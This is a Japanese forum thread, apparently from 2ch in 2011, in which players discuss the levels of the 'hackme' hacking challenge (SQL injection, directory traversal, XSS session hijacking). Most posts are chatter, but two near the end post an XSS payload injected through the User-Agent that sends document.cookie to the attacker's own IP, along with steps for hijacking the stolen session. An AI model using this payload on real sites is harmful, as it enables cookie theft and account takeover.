hackme まとめ。
Lv1:ある程度ネットに親しんでいる人なら誰でもクリア可能。
Lv2:SQLインジェクション
Lv3:ディレクトリトラバーサル
Lv4:セッションハイジャック(XSSで盗聴)
Lv5:不明
hackmeは注目が増えて評判は下がる一方だなw
ネットファイアすげーって全く思えないのがすげー
まとめ。(キリッ
お前馬鹿だろ
Lv5って、一応ほんとのIDパスは用意してるけど、こういう構成にしてると破られないでしょ?
いろいろな情報を表示するのもいいけれど、気をつけないと危険な目にあいますよ、といいたいのかなぁ
ランキングのhtml出力見たけど、
改行タグの位置がLv5(h1閉じ直後)とLv4(IDリストの次の行)で違うね。
ひょっとしたらLv5の位置には最初からIDリストの出力が想定されてないんじゃないかって気が
問題としてる以上何らかの脆弱性がないとフェアじゃないんじゃないか
さすがにそれやったら評判うんこだろ
当たり抜きのくじみたいなもん
だが中の人も解いてないんだぜやおいちゃん
この手のサイトつくっておいて
「100万PV達成しました!ありがとうございます!」
だぜ?
PVがいかに指標として役に立たないかについても言及するつもりがあるならいいけど、ねぇw
これでLv5の問題がガチな脆弱性発見してくださいとかなら公式のページ破壊するしかないな
試して変化があれば正解、そうじゃなければ不正解。
なんでそんなのも判断できないの?
lv5は高木さん降臨しないと無理っぽい
というか以外と国内のセキュリティに詳しい人ってそれ程でも無いんだなぁとこのテストからわかった
はまちちゃんまだか
>>802 確かにな。中の人がLv5クリアしてないってのは大きなヒントかもな。
>>808 さすがに挑戦してないだけだろう
じゃなきゃ面目にかけて2chでもなんでも見てLv4に名前があるはず
にょき!を入手したのはいいがこれ本物と違わね?なにごとや
つか、ここにコード書くんじゃねぇーよ
コード書くなとかネタバレすんなって言ってる奴は社員か?
はまちちゃんにLv5やって欲しいわー
>>812 じゃあ真面目に答える。
それじゃない。
社員じゃないけどコード書いてネタばれはないわ
そしてすまん
ここに載ってる不正解コードはIE6じゃ動かないんだな
Lv5はこれなんなの?
難しすぎる
Lv5はソーシャル・エンジニアリング
netfire社のゴミ袋に正解が書いてある
>>820 何でみんなそう書いてんだろう、と不思議に思ってたんだけど、いつのころからかそう書けるようになってたんだね。。。しらなかった。
lv5は管理者権限奪取
foobar限定で狙ってるわけではないのでIE6にそこまで拘る必要もない
っていうのもある。
lv5、エラー出たかも…
でも、、これ再現の仕方がよくわからん…
827 :
名無しさん@お腹いっぱい。:2011/02/25(金) 04:06:03.50
TwitterでLv2の答え書いてるアホが多いな
Lv4やっとクリアした…
つーか、user agent switcher って UA の変更したあとにツールからまた選択しなおさないといけないのな…
こんなくだらないことで数時間無駄にしたわ
Lv4突破。にょき!に気づかず恐らく何回か遠回りしていた
にょきったものをどう使うの?
さすがにこれは辛いな。
Lv4ってfoobarがログインまだしてますよってのを利用するのかな。
話聞いてるとクッキー内のsessionidで判別してるっぽいけどfoobarのsessionidなんてわからないよね。
そこをどうにかするのがみそなのかな
Lv5のエラーメッセージ見えた。赤字で出る。
にょきって具体的にどんな表示?
まぁ見ればすぐわかるようににょき!
でもそれをどうするかがわからない sessionidとは違うみたいだ
>>835 JavaScriptをONにした状態でログイン後の表示を3秒見る
変化がなければ失敗
視力0.5でも見落とさないくらいでかい
>>831 そこはまったく理不尽さがない
ぐぐれとしか
>>833 スレが落ちる前にもう一度読み直すべき
どういう技術を使うかはわかる
解らなかったら一から勉強しなおすレベル
Lv5、まったくわからん。「The input field '' was not expected.」とか「文字を与えてください」でどうこうではないんだろうなあ・・
前から思ってたんだが、英数字と下線のみなのにどうして-は蹴られないんだ?
全てのLvでいえるんだが。
フィールド名もサニタイズされてるっぽくてむりぽ
>>840 改行も蹴られないっぽい
でも改行と-にしたら蹴られた
スクリプトが実行可能なようですってちょっと意味が分からないんだけど
>>844 firebugとかで、htmlをこんな感じにしてpostした
別のLvでも再現できるから、これではなさそう
「The input field '' was not expected.」
<td><input type="password" name="password" value=""/></td>
↓
<td><input type="password" name="password" value=""/></td>
<td><input type="password" name="password2" value=""/></td>
「文字を与えてください」
<td><input type="password" name="password" value=""/></td>
↓
<td><input type="password" name="password" value=""/></td>
<td><input type="password" name="password" value=""/></td>
フィールド自体消去するとMissingValueとか出るけど、
内部の情報見たり他人のデータ掠め取るのには到底使えない。ふむ
>>721 それじゃログインできなかった人しかこないよ
わからん
クイズの答えを人に聞くんじゃねぇ
Lv4は他鯖必要ないってんだからdocument.location使う意味ないよね。
コレって別のアドに飛ばすもんでしょ?
とするとどうすりゃいいのさ・・・
いるけどいらない
ニョキってなんだよー!
どうやって出すんだよー!
ニョキはもう答えだから、出し方教えたらい見ないでしょ
726の言ってるなりすましってのはやっぱりfoobarのsessionidとかってはなしなのか?
なんか色々いじいじしてたら
Missing value
っつてエラーが出た
普通は英数と数字と〜とか入力してくださいってエラーだからちょっと前進なのかしら
自サバを使うようなスクリプトが正解だけど自サバを実際に立てる必要は無いって事?
Lv4が一番するっと通った気がするのだけどそんなにややこしかったかな
>>857 俺もそれ思ったけど、Lv1から出るエラーだからあってるのか迷ってる。
lv4のニョキの送信方法のヒントくれ
自分が使ってるので書き換えてアクセスしても通らない
>>861 書き換えるってか追加するだけでおk
名前まで丁寧に出てるしな
実際に立てる必要無いってコトはnetfireの方にクッキー盗聴するスクリプトがあるのかね。
ユーザーエージェントにlocation云々書いてfooさんアクセスを待つ。
んでアクセスしたんだろうなーってところで盗聴スクリプトからfooのsessionidをコピる
sessionidコピったら自分のidを書き換えてpost出来るソフト化なんか使ってアクセス
(゚д゚)ウマー
・・・って事なのかな
たしかにコレなら必要だけど必要じゃないってのもハマってると思うんだけどな。
>>862 いまいち理解できてないな俺
これはsessionidだけどsessionidじゃないんだよな?
ソフト変えてみようかな
だからなんでネタバレするん?それもうヒントじゃねーじゃん。
アホなの?自己中なの?
javascript知らないしヒントの域にすら入ってないから心配すんあw
Lv4はほぼ答えが出てるから、これ以上ここで考察しても意味ない
あとは自分で考えろ
まあ確かにlv4はちょっとイラッとくるのはわかる。
何時間無駄にしたんだよって感じ。
Lv4、こんだけ試したのにニョキってのやらがでないなら
俺はもう製作者の意図(笑)を理解することは一生できんわ、諦めよう
> @Netfire_Inc: Lv4の合格判定を修正しました。
少し緩くなったっぽいな。今まで失敗してた人も多分これで通ると思う
873 :
名無しさん@お腹いっぱい。:2011/02/25(金) 09:40:54.83
ブラウザ使わずにずっとPHPからリクエスト投げてたせいでニョキを見落としてたわ…
(Lv4) 称号:ハッカー の方々
総勢100人
ランキング省略されたな。おつかれ
Lv5がさっぱりわからねーよ。
>>873 うわぁ、おれperl。
ブラウザでやり直しか・・・
ニョキってまさかポップアップ?
ポップアップブロックしてたら永遠にミリなの??
違うならいいけど。
879 :
名無しさん@お腹いっぱい。:2011/02/25(金) 10:16:27.43
>>876 ログイン履歴の少し下のあたりを見とくといいよ
寝ておきて同じスクリプト試したら2秒でできた・・・
なんということだ
>>880 俺も・・・。中の人がLv4の合格判定したって言ってるけど関係あるのかな。
それか
>>828か。
882 :
名無しさん@お腹いっぱい。:2011/02/25(金) 11:06:31.85
総当たりさせろよ〜w
あっという間にBANされて笑うわ
ぶっちゃけLv2〜Lv4って手法が違うだけで難易度似たようなもんだよね
>>883 判定基準が中の人次第だからね
lv4とか昨日はダメだったけど今日やったらするっと行ける時点でどうにも・・・
Lv2 パターンは少ないが製作者の意図を汲まないと無理
Lv3 一般的
Lv4 パターンも多く製作者の意図を汲まないと無理→ちょいゆるめになった
結構違う
>>885 新しいLv2は製作者の意図もなにもない、一般的な奴になったよ
新しいLv4も、「これが通るのにあれが通らないの?」っていうのは残るけど一番オーソドックスな方法で通る
Lv5ってさ、
「脆弱性なんか作ってないけどアカウントは作ってあるから各々頑張って突破してみ?」ってことなんじゃね?
Lv5わかんねーよ! 一応HTTPヘッダも見たけど怪しいところなし。
--> HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Cache-Control: no-cache
Content-Encoding: gzip
Date: Fri, 25 Feb 2011 02:23:29 GMT
Server: Google Frontend
Content-Length: 1933
Lv4
にょきの情報をどう使えばいいのかわからん
ヘッダに書くんじゃないの?
>>889 それが解らないなら実力がLv4に達してない
>>887 一応ヒントっぽいものは見つけたけどさ。
これ、どうやって使えって言うんだろう?
LV4そろそろネタバレしてもいいかな?
もういいんじゃねw
宣伝は終わったww
結局lv5で自分とこの製品チェックしたいんだよ。
lv3の時は「バカが」とおもったけど
lv4の時は言うやつ居ないんじゃ・・・ないだろうかw
>>894 Lv5のURLって「/Lv5/login」じゃん?
Lv5のだけ何故か末尾に/をつけても404にならないんだよね。
Lv4以下で試したら全部404になった。
これってURLを弄れってことなんじゃないかな?って思ってさ。
Lv4、最初のコードの判定はちょっと酷かったかもしれないけど
にょきが出た後はヒントいらないだろ
それが解らないならそこまで来れたのがおかしい
自分のをにょきのに書き換えてsendしてもloginに戻されるぞ・・・
どういう事なの
>>896 あー、本当だ。どっちでも通るね。
しかし、確かにこれをどう判断するかは難しいな。
あー、書き換えじゃなくて追加か。
なるほどと思ったありがとう
おかげでLv5です
中の人が「人数増えたし、そろそろLv5破られるかな?」と言っておる。
ってことは、一応脆弱性はちゃんと用意されてるって事なのかな。
LV5クリア。また理不尽な問題だったぜ
Lv4昨日やってだめだったのが通った…
にょきっも笑えねぇよ…
907 :
名無しさん@お腹いっぱい。:2011/02/25(金) 11:58:50.24
げー。昨日ダメだったの一発で通ったよLv4。
昨日までの正解はどんなのだったんだろう。もはや自力じゃ知るすべがない。
そろそろLV4の正解も晒そうかな
ってかさ・・・・なんでもない。
そこまでして構ってほしいの?
Lv4 までは正解できないまでも、ざっくり予想はつく範囲だったのに、Lv5 は本当に
取り付くしまも無いな。
お前ら情報戦は弱いんだな
「さらそうかな」と言ってる奴は解けてない奴
晒したいけど我慢してる奴に「どうせ出るなら俺が晒せば賞賛は俺のもの」と思わせるのが狙い
>>908 もうすでに晒されてるようなもんだし、別にいらないんじゃね?
情報戦とかいいから改定前の正解晒せよ
917 :
名無しさん@お腹いっぱい。:2011/02/25(金) 12:10:24.20
/Lv6/ だと /Lv5 に転送されるけど、
/Lv7/ だと 404 になるから、一応Lv6は存在するのかもしれない・・
改定後の正解知ってるなら
改定前の正解とか簡単に予想つくんでは
つーかcookieのセットすらできない連中がすでにLv4まできてるとか
凄まじいな
いつの間にやらスレが埋まりそうな感じだな。
999にLV4の答えを書く
じゃあLV5のヒント:javascriptエラーがある
まぁLv4に関してはもう答え晒されてるようなもんだしそろそろどっかの誰かがまた「晒されてますよ?」
って中の人にいうんじゃないかと・・・w
ネタバレって規約違反じゃね?
中の人も「やめて><」って言ってるくらいだしなw
正直ただでさえ楽っていうか分かりやすくになったのにこれ以上分からんとか言ってるのは1から勉強しなおせレベル。
</li><script>document.location="
http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
おい、あんまりいじめてやるなよw
埋め
あーLv5いけたかも。
現在LV4総勢148人
↓増え続ける
こんだネタバレあってわかんないのはそもそもxssとか名称だけしっててやってることは理解してないんだろうな
やった、Lv4通ったー
昨日やって通らなかったはずのが通った
SQLインジェクションとかXSSとか名前だけ知ってる程度の知識だったけど、どういう仕組か理解できたわ
Lv3はUNIXすこし触ったことあったからすぐ理解できた
Lv3についてはかなり初期の時点で誰かがディレクトリトラバーサルって単語漏らしたからググってクリアしたんだけど、あの人は全然叩かれないんだな
ネタバレ起きてから合格しても同格とか思わないでほしいんで、その辺夜露死苦
>>945 URLみたら誰でもすぐに思いつくことだからね。
あたり前のこととしてスルーされたんじゃね。
あれみてディレクトリトラバーサルと思いつかないような奴は普通Lv3までいけないはずなんだよなww
tempとかUNIXそのまんまだし
ディレクトリトラバーサルはネタバレとはいえない
レベルのすぐ分かることだな。
レベル4でネタバレになったのはUAに突っ込むというアイデアだ。
自力で「ウホッ」と気付いたやつは自負していいレベルだけど
ここまできてもクリアできてないやつはもう本筋から離れたレベル。
自分が一番よく分かってるだろうw
やっぱ時系列は上から下としか思えない
lv5ェ・・・
今見たら157人がLv4クリア
流石にだいぶ増えたな
俺がuser-agentって書いた時点では10人ぐらいだったのになぁ
判定基準甘くなったからな・・・昨日ダメなのが今日は行けたし
まぁ、所詮セキュ板の雑魚どものレベルなんてそんなもんだ
Lv2とLv4はそれぞれ2つか3つくらいのレベルに分けて
手法は同じでも
Lv2-easyはオーソドックスなパターン
Lv2-normalはちょっとひねったパターン
Lv2-hardは珍しいパターン
みたいにすればよかったのにね
これなら途中で判定基準変えたりして文句も言われなかったかも
関係ないけどBackTrackのページの左側に勇気、力、決心って書いてあってワロタ
なんの意味があるんだろうか
LV5は株式会社ネットファイアの製品netfire-v1の試験だな
ランキングの称号が「ハッカーの方々」から「仮免許ハッカーの人」になってるw
この会社、煽ってくるぞw
「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?
ワロス
「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?
クソ吹いたwwww
むしろ判定基準がチートだと思うがww
中途半端にスクリプト通らないからもうややこしい
って会社が煽るなよwww
ネタバレ位想定できただろうにw、それで煽ってくるとかw
ほんとだ、さっきまで
セキュリティ関係なら簡単かな?
みたいな感じのコメントだったのにwww
これでまさかのlv5がランキングページ書き換えでした!とかだったらどうしよう・・・
自鯖がいるようでいらない、sessionidなようでsessionidじゃない
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
に変わったw
■LV4のクリア方法(ネタバレ)
firefoxのアドオンにCS LiteとUser Agent Switcherをインストールします。
んで、User Agent Switcherで新しいUser Agent(以下UA)を作り、User Agentの項目に
</li><script>document.location="
http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
と書きます。
そのUAに設定して適当なID・PASSでログインします。
すると左下にセッションIDを盗みました的なAJAXウインドウが出てきます。
盗んだセッションをCS Liteアドオンを使って自分のブラウザのクッキーに登録します。
そして戻るボタンをクリックするとクリアできます。
m
>>969 書き換わったw
「仮免許ハッカー」です。なかなか。
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
どうせならクリア時に、お手本を公開すればいいのになぁ(特にlv4)
昨日と今日で判定基準変わってるんだし
結局昨日の答えはなんだったのか気になる。
最後に解答例とか出してほしいな
978 :
名無しさん@お腹いっぱい。:2011/02/25(金) 13:48:08.75
煽るくらいならもっと柔軟性を持った判定にしろよなー
かつてないほどセキュリティ板のアクセスが集中しております
だれか、lv2教えてくれ
Lv2修正された?昨日よりやさしくなってるっぽいけど
今更LV2の答え教えても目立たないしな。
985 :
名無しさん@お腹いっぱい。:2011/02/25(金) 13:50:59.63
煽る煽るw
社員2ch張り付きすぎだろw
>>981 そこはスレ嫁でいいんだよ
もう散々書かれてるんだから
そりゃここのスレは重要監視なんじゃね?
lv4も暫定停止フラグだなw
本物のハッカーが163人もいるとか不自然だろ。
最初の2〜3人ぐらいが本物なんじゃね
>>988 俺もそう思うわ。
一応、昨日クリアしたけど、その時点でもちらほらヒントが出てたしなあ。
■LV4のクリア方法(ネタバレ)
おくれましたが公開です。
まずページを開きます。
Explororのアドレス欄に次の文を打ち込みます→javascript:var t="お";var k="えア";var m="ま";var a="ホ";alert(t+m+k+a);document.write(t+m+k+a);
あとでメッセージが出てくるのでそれを読みます。
ほとんどそこまでいけばクリアですよー!
LV2合格者って1万人ぐらいいるのかな?
こんなことだけでハッカーかどうかなんてわからんだろ
判定が理不尽じゃなければ
Lv4までは解ける範囲だと思うけどなー
スレ読んでもわからん
このサイトの公開初日にLv2クリアしてたの4人くらいだったな
その最初の4人はLv4でも名前あったからその人達は本当の知識と技術があるひとだな
997 :
名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:27.63
クッキーの書き換えがわからん
その域に達していないらしい
lv3まではスイスイいけたんだが
webわかんね
LV4も再度やってみたけど、自分IPとdocument.cookieの文字が入ってれば
文法的に間違ってても正解になるみたいね
>>994 それはさすがに勉強不足なだけなんじゃ・・・。
1000
1001 :
1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。